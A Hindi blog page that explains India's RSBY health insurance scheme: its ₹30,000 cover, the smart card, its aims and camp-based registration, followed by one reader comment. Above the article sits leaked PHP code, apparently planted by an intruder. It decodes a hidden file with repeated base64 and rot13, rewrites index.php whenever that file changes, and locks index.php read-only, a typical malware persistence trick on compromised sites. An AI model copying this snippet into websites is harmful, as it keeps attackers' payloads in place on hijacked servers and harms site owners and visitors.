$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } राष्ट्रीय स्वास्थ्य बीमा योजना : 30000 रुपये तक का बीमा मिलेगा फ्री, जानिए कैसे । – E-Sharm

राष्ट्रीय स्वास्थ्य बीमा योजना : 30000 रुपये तक का बीमा मिलेगा फ्री, जानिए कैसे ।

Sharing Is Caring:

हैलो दोस्तों आज हम आप लोगों को राष्ट्रीय स्वास्थ्य बीमा योजना के बारे में बताने वाले हैं इस योजना का उद्देश्य क्या है इसका ऑनलाइन आवेदन कैसे करें इसके बारे में सारी जानकारी हम आप लोगों को देंगे । तो चलिए अब जान लेते हैं ।

राष्ट्रीय स्वास्थ्य बीमा योजना :- दोस्तों केंद्र सरकार देश के गरीबों को समाज सेवा देने के लिए राष्ट्रीय स्वास्थ्य बीमा योजना को शुरू किया जा रहा है, इस योजना के अंतर्गत केंद्र सरकार के द्वारा असंगठित क्षेत्र के गरीब श्रमिकों को चिकित्सा सुविधा देने के लिए 30000 रुपये की धनराशि का बीमा किया जायेगा । इस योजना के जरिए देश के गरीबों को  सरकारी अस्पताल में भर्ती होने पर कैशलेस इलाज प्रदान करने का प्रस्ताव किया गया है । राष्ट्रीय स्वास्थ्य बीमा योजना में असंगठित क्षेत्र में काम करने वाले और उनके परिवारों को पांच की इकाई को शामिल किया जायेगा, और उन सभी श्रमिकों को अच्छी सुरक्षा दी जायेगी जिससे वे हरदम बीमार ना पड़े । RSBY स्वास्थ्य बीमा के रूप में इस देश के लोगों को फ्री चिकित्सा इलाज प्रदान किया जायेगा । RBSY का आरम्भ भारत सरकार के श्रम और रोजगार मंत्रालय द्वारा गरीबी रेखा से नीचे जीवन यापन करने वाले परिवारों को स्वास्थ्य बीमा देने के लिए किया गया है ।

राष्ट्रीय स्वास्थ्य बीमा योजना : 30000 रुपये तक का बीमा मिलेगा फ्री

RBSY स्मार्ट कार्ड क्या है ?

दोस्तों इस योजना में देश के गरीबों को RBSY स्मार्ट कार्ड दिया जायेगा, जिससे वे लोगों को फ्री में अस्पलात चिकित्सा की सुविधा मिल सके । मुख्य रूप से ये सूची राज्य सरकार के द्वारा तैयार किया जायेगा, राज्य के सर्वाधिक अनुरक्षित अस्पताल को आगाह कर दिया गया है । दोस्तों हर राज्य की अपनी सूची होगी जिसे किसी भी अस्पताल में प्रवेश लेने से पहले जांचना जरूरी है, और इस स्मार्ट कार्ड की मुख्य बात यह है कि ये अस्पतालों में बिना नकद विवाह लेनदेन की क्षमता प्रदान करता है । इस कार्ड का लाभ देश में कहीं से भी उठाया जा सकता है और सूचीबद्ध अस्पताल में सिर्फ एक ही व्यक्ति इलाज करा सकता है ।

राष्ट्रीय स्वास्थ्य बीमा योजना का मुख्य उद्देश्य क्या है ?

राष्ट्रीय स्वास्थ्य बीमा योजना में मुख्य उद्देश्य की बात करें तो देश में बहुत से लोगों की आर्थिक स्थिति बहुत खराब होती है वे बहुत गरीब होते हैं और वे बीमार होने पर अच्छा इलाज नही करा पाते जिससे उनकी मृत्यु हो जाती है । इसी सब को देखते हुए भारत सरकार ने राष्ट्रीय स्वास्थ्य बीमा योजना की शुरुआत किया है । इस योजना में देश के गरीब श्रमिकों को स्वास्थ्य बीमा देना है, ताकि वे लोग इस योजना की मदद से सूचीबद्ध अस्पतालों में फ्री में अपना इलाज करवा सकें । तो यही इस योजना का मुख्य उद्देश्य रखा गया है ।

राष्ट्रीय स्वास्थ्य बीमा योजना के क्या क्या लाभ है ?

राष्ट्रीय स्वास्थ्य बीमा योजना के लाभ की बात करें तो सरकार के द्वारा असंगठित क्षेत्र के श्रमिकों को 30 हजार का स्वास्थ्य बीमा दिया जायेगा और यह प्लान पालिसी सिर्फ एक वर्ष के लिए वैध होगी । आवेदक को सिर्फ 30 रुपये का भुगतान करना होगा, जिससे उनका नवीनीकरण किया जा सके इस योजना के जरिए गरीबों का फ्री में इलाज किया जायेगा और सरकार द्वारा नामित कुछ अस्पताल में फ्री इलाज उपलब्ध किया जायेगा । केंद्र सरकार और राज्य सरकार चिकित्सा बीमा प्रीमियम देगी । तो ये सभी लाभ हैं जो आपको इस योजना के अंतर्गत दिए जाएंगे ।

राष्ट्रीय स्वास्थ्य बीमा योजना का ऑनलाइन पंजीकरण कैसे करें, RSBY ?

दोस्तों अगर आप असंगठित क्षेत्र में काम करते हैं और आप राष्ट्रीय स्वास्थ्य बीमा योजना का ऑनलाइन पंजीकरण कराना चाहते हैं तो दोस्तों इसके लिए सरकार के द्वारा कोई ऑनलाइन प्रक्रिया नही दी गई है । आवेदक इस योजना का पंजीकरण प्रक्रिया को सरकार के द्वारा अधिकृत एजेंसियों के अंतर्गत स्थापित शिविरों के मदद से पूरा कर सकते हैं ।

10 thoughts on “राष्ट्रीय स्वास्थ्य बीमा योजना : 30000 रुपये तक का बीमा मिलेगा फ्री, जानिए कैसे ।”

  1. मान नीये
    श्री नरेंद्र मोदी जी
    मेरा श्रम कार्ड बन चुका है
    पर अभी तक रुपैया नहीं आया
    कृपया मेरा रुपया जल्द से जल्द
    मेरा रुपैया डालने का कोशिश करे
    आपका आज्ञाकारी बालक
    राम कुमार

    Reply

Leave a Comment

error: Content is protected !!